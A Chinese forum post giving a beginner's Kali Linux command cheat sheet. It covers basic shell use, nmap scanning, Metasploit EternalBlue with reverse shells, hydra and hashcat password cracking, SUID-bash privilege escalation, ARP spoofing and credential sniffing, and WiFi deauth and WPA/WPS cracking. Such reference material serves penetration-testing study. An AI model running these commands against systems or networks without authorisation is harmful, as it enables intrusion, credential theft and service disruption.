找回密码
 立即注册
首页 业界区 业界 Kali Linux入门手册 | 添柴不加火

Kali Linux入门手册 | 添柴不加火

获弃 前天 17:40
目录

  • 一、基础系统/目录操作
  • 二、文件编辑/查看操作
  • 三、网络基础操作
  • 四、信息收集命令
  • 五、端口/网段扫描命令
  • 六、漏洞探测/利用基础(Metasploit示例)
  • 七、密码破解命令
  • 八、提权/本地渗透命令
  • 九、嗅探抓包/流量分析
  • 十、无线渗透命令

一、基础系统/目录操作


  • ls — 列出当前目录文件/文件夹
  • ls -l — 详细列出文件属性(权限、大小、修改时间)
  • ls -a — 显示隐藏文件(包含.和..)
  • ls -la — 详细显示所有文件(含隐藏)
  • cd / — 切换到根目录
  • cd .. — 切换到上一级目录
  • cd ~ 或 cd — 切换到当前用户主目录
  • cd - — 切换到上一次操作的目录
  • pwd — 查看当前所在绝对路径
  • mkdir test — 创建名为test的文件夹
  • mkdir -p /a/b/c — 递归创建多级目录
  • rm file — 删除单个文件
  • rm -f file — 强制删除文件(不提示)
  • rm -r dir — 递归删除文件夹及内部内容
    危险命令:rm -rf / 或 rm -rf /* 会瞬间清空整个系统。永远先用 ls 确认路径,再执行带 -r 或 -rf 的删除。

  • rm -rf dir — 强制递归删除(高危,谨慎使用)
  • cp file /tmp/ — 复制文件到指定目录
  • cp -r dir /tmp/ — 递归复制文件夹
  • mv file /tmp/ — 移动文件到指定目录(也可用于重命名)
  • mv oldname newname — 给文件/文件夹重命名
  • touch newfile — 创建空文件
  • chmod 777 file — 赋予所有用户读写执行权限
    极度危险,生产环境几乎从不使用777。常见安全组合:文件 chmod 644,目录/可执行脚本 chmod 755。

  • chmod 755 file — 所有者读写执行,其他用户读执行
  • chown root:root file — 修改文件所属用户和组为root
  • df -h — 查看磁盘空间(人性化显示)
  • free -h — 查看内存/交换分区使用情况
二、文件编辑/查看操作


  • cat file — 正序查看文件全部内容
  • tac file — 倒序查看文件全部内容
  • head file — 查看前10行
  • head -n 20 file — 查看前20行
  • tail file — 查看后10行
  • tail -n 20 file — 查看后20行
  • tail -f file — 实时监控文件变化(日志分析最常用)
  • more file — 分页查看(空格/回车翻页)
  • less file — 高级分页查看(支持上下翻页、/搜索)
  • nano file — 简易文本编辑器
  • vim file — 高级编辑器(按 i 编辑,Esc 退出编辑,:wq 保存退出,:q! 强制退出)
  • grep "keyword" file — 在文件中搜索关键词
  • grep -i "keyword" file — 忽略大小写搜索
  • grep -r "keyword" dir — 递归搜索整个目录
  • wc -l file — 统计文件行数
三、网络基础操作


  • ifconfig — 查看/配置网络接口(旧命令)
  • ip a 或 ip addr — 现代推荐命令,查看网络接口详情
  • ip addr add 192.168.1.100/24 dev eth0 — 临时添加IP(重启丢失)
    网卡名说明:eth0 仅为示例,现代系统常见 ens33/enp03/wlan0 等,用 ip link 查看真实名称。很多工具支持 -i any(所有接口)。永久配置建议用 nmcli 或 Netplan。

  • route -n — 查看路由表
  • ip route — 现代路由查看/配置命令
  • ping ip — 测试连通性(默认无限发送,按 Ctrl+C 停止)
  • ping -c 4 ip — 发送4个包后停止
  • ping -i 0.5 ip — 每0.5秒发一个包(快速探测)
  • netstat -tulnp — 查看监听端口及进程(过时,推荐 ss)
  • netstat -an — 查看所有连接(过时)
  • ss -tulnp — 现代首选,快速查看监听端口
    口诀:新系统一律用 ss!

  • arp -a — 查看ARP缓存表
  • arp -s ip mac — 静态绑定IP和MAC
  • hostname — 查看主机名
  • hostname newname — 临时修改主机名
  • curl url — 访问URL并显示内容
  • wget url — 下载文件到当前目录
  • wget -O newname url — 下载并自定义文件名
  • curl ifconfig.me — 查看本机公网IP(备选:curl icanhazip.com 或 curl ip.sb)
  • telnet ip port — 测试指定端口是否开放
四、信息收集命令


  • uname -a — 查看内核版本、系统架构、主机名等
  • cat /etc/issue — 查看系统发行版简要信息
  • cat /etc/os-release — 详细查看系统版本信息(推荐)
  • whoami — 查看当前登录用户名
  • who — 查看当前所有登录系统的用户
  • w — 查看当前登录用户及正在执行的操作
  • last — 查看系统登录历史记录
  • ps -ef — 查看所有运行的进程(详细信息)
  • ps aux — 以BSD格式查看所有进程
  • top — 实时监控系统进程(资源占用、PID等,按 q 退出)
  • pstree — 以树形结构查看进程关系
  • netstat -antp — 查看所有TCP连接及对应进程(过时,建议用 ss)
  • find / -name "*.sh" — 从根目录搜索所有.sh后缀的文件
    提示:从根目录搜索很慢,建议指定路径如 find /home -name ...

  • find / -perm -4000 -type f 2>/dev/null — 搜索SUID权限文件(常用于提权线索)
  • arp-scan -l 或 arp-scan --localnet — 扫描局域网存活主机(Kali常用)
  • fping -g 192.168.1.0/24 — 快速扫描C段存活主机
  • cat /etc/passwd — 查看系统所有用户信息
  • cat /etc/group — 查看系统所有用户组信息
  • cat /var/log/auth.log — 查看系统认证日志(登录、sudo操作等)
  • lsof -i:80 — 查看占用80端口的进程
五、端口/网段扫描命令


  • nmap ip — 默认扫描目标(1000个常用端口)
  • nmap -sn 192.168.1.0/24 — 仅扫描网段存活主机(无端口扫描)
  • nmap -p 80 ip — 仅扫描80端口
  • nmap -p 1-65535 ip — 扫描所有端口
  • nmap -p 80,443,22 ip — 扫描指定多个端口
  • nmap -sT ip — TCP全连接扫描(易被检测)
  • nmap -sS ip — TCP SYN半开放扫描(隐蔽,默认推荐)
    区别:-sS 只发SYN,不完成握手,不易被记录;-sT 完整握手,像正常访问。

  • nmap -sU ip — UDP端口扫描
  • nmap -sV ip — 扫描端口并探测服务版本信息
  • nmap -O ip — 探测目标操作系统类型(大写O)
  • nmap -A ip — 全面扫描(存活+端口+版本+OS+脚本)
  • nmap -T4 ip — 提高扫描速度(-T0 最慢,-T5 最快)
  • nmap -oN result.txt ip — 保存为普通文本
  • nmap -oX result.xml ip — 保存为XML格式
  • nmap --script=vuln ip — 加载漏洞脚本探测已知漏洞
    2026年提示:nmap脚本引擎更新频繁,vuln脚本false positive较多,建议结合-sV使用。

  • nmap --script=brute ip — 加载暴力破解脚本(弱口令尝试)
  • nmap -Pn ip — 跳过主机存活检测,直接扫描端口(目标禁ping时必加)
  • nmap -D RND:10 ip — 使用随机10个假IP欺骗源地址(隐藏真实IP)
  • masscan 192.168.1.0/24 -p 80,443 — 超高速端口扫描(比nmap快得多)
  • zenmap — 打开Nmap图形化界面(适合新手)
六、漏洞探测/利用基础(Metasploit示例)


  • msfconsole 或 msfconsole -q — 打开Metasploit控制台(-q 安静模式推荐)
  • search ms17-010 — 搜索指定漏洞模块
  • use exploit/windows/smb/ms17_010_eternalblue — 加载漏洞利用模块
  • show options — 查看模块所需参数
  • set RHOSTS ip — 设置目标IP
  • set LHOST ip — 设置本机攻击IP(反弹shell用)
  • set LPORT 4444 — 设置监听端口
  • exploit 或 run — 执行漏洞利用
  • back — 退出当前模块
  • sessions -l — 查看所有反弹shell会话
  • sessions -i 1 — 进入编号1的shell会话
  • sessions -k 1 — 关闭编号1的会话
  • nessusd start — 启动Nessus服务(旧写法)
  • nessuscli scan --launch 123 — 启动指定Nessus扫描任务
    注意:Nessus新版本多用systemctl管理或web界面操作。

七、密码破解命令


  • hydra -l root -P pass.txt ssh://ip — 破解SSH(用户名+密码字典)
    提示:在线暴力易被封IP,可加 -t 4 限制线程。

  • hydra -L user.txt -P pass.txt rdp://ip — 破解RDP
  • hydra -l admin -P pass.txt http-get://ip — 破解HTTP GET登录
  • hydra -l admin -P pass.txt mysql://ip — 破解MySQL
  • john --wordlist=pass.txt passwd — John the Ripper 破解系统密码文件
  • john --show passwd — 查看已破解密码
  • hashcat -m 0 hash.txt pass.txt — Hashcat破解MD5
  • hashcat -m 1000 hash.txt pass.txt — 破解NTLM
  • crunch 6 8 0123456789 -o 6-8num.txt — 生成6-8位纯数字字典
  • crunch 8 8 abc123 -o 8char.txt — 生成8位字母+数字字典
  • cewl url -w webpass.txt — 从网站爬取内容生成专属字典
  • medusa -u root -P pass.txt -h ip -M ssh — 美杜莎破解SSH(速度快)
  • sqlmap -u url --forms — 检测SQL注入并尝试破解数据库
  • fcrackzip -D -p pass.txt test.zip — 破解ZIP压缩包
  • 7z x test.zip -p123456 — 用已知密码解压加密ZIP
八、提权/本地渗透命令


  • sudo -l — 查看当前用户可用的sudo命令(提权核心)
  • sudo su — 以root权限切换用户
  • su root — 切换到root(需root密码)
  • id — 查看当前用户UID、GID、组信息
  • find / -type f -perm -4000 2>/dev/null — 搜索SUID文件
    常见可利用:find、vim、nano、less、more、cp 等(视系统版本而定)

  • find / -type f -perm -2000 2>/dev/null — 搜索SGID文件
  • chkrootkit — 检测rootkit后门
  • unshare -rm /bin/bash — 利用内核漏洞临时提权(老漏洞,成功率低)
  • cp /bin/bash /tmp/bash; chmod 4755 /tmp/bash — 制作SUID bash
  • ./tmp/bash -p — 执行SUID bash提权
    现代防护:很多系统有no-new-privs等机制,成功率大幅下降,仅学习参考。

  • ps aux | grep root — 查看root进程(寻找提权突破口)
  • cat /proc/cmdline — 查看启动参数(找提权线索)
  • lsmod — 查看加载的内核模块
  • exploit-db — 打开Exploit-DB漏洞库(Kali内置)
九、嗅探抓包/流量分析


  • tcpdump -i any — 在所有接口抓包(推荐any而非eth0)
  • tcpdump -i any -w cap.pcap — 抓包保存为pcap文件
  • tcpdump -i any port 80 — 仅抓80端口流量
  • wireshark — 打开图形化抓包工具
  • tshark -i any — Wireshark命令行版
  • arpspoof -i any -t 192.168.1.100 192.168.1.1 — ARP欺骗
    2026年推荐:bettercap(功能更全,支持HTTPS/DNS等中间人攻击)

  • driftnet -i any — 嗅探局域网图片流量
  • urlsnarf -i any — 嗅探URL访问记录
  • dsniff -i any — 综合嗅探(捕获FTP/HTTP/SMB凭证)
  • ngrep -d any "password" — 过滤包含关键词的网络流
十、无线渗透命令


  • airmon-ng start wlan0 — 开启监听模式(网卡变为wlan0mon)
  • airmon-ng stop wlan0mon — 关闭监听模式
  • airodump-ng wlan0mon — 扫描周围WiFi
  • airodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -w wifi wlan0mon — 定向抓包
  • aireplay-ng --deauth 0 -a XX:XX:XX:XX:XX:XX wlan0mon — 无限deauth断网攻击
  • aircrack-ng -w pass.txt wifi-01.cap — 字典破解WPA/WPA2
  • reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vW — 破解WPS
  • wash -i wlan0mon — 扫描开启WPS的设备
  • kismet — 无线流量嗅探/扫描(图形化)
  • bully -i wlan0mon -b XX:XX:XX:XX:XX:XX — WPS破解(成功率较高)
    提示:运行前常需 airmon-ng check kill 杀干扰进程

如果未安装kali,可以参考作者另一篇文章:https://www.cnblogs.com/xize766/articles/19548059/vm-kali-install
温馨提示:本文仅供学习参考,任何违法行为均与作者无关。

来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

相关推荐

您需要登录后才可以回帖 登录 | 立即注册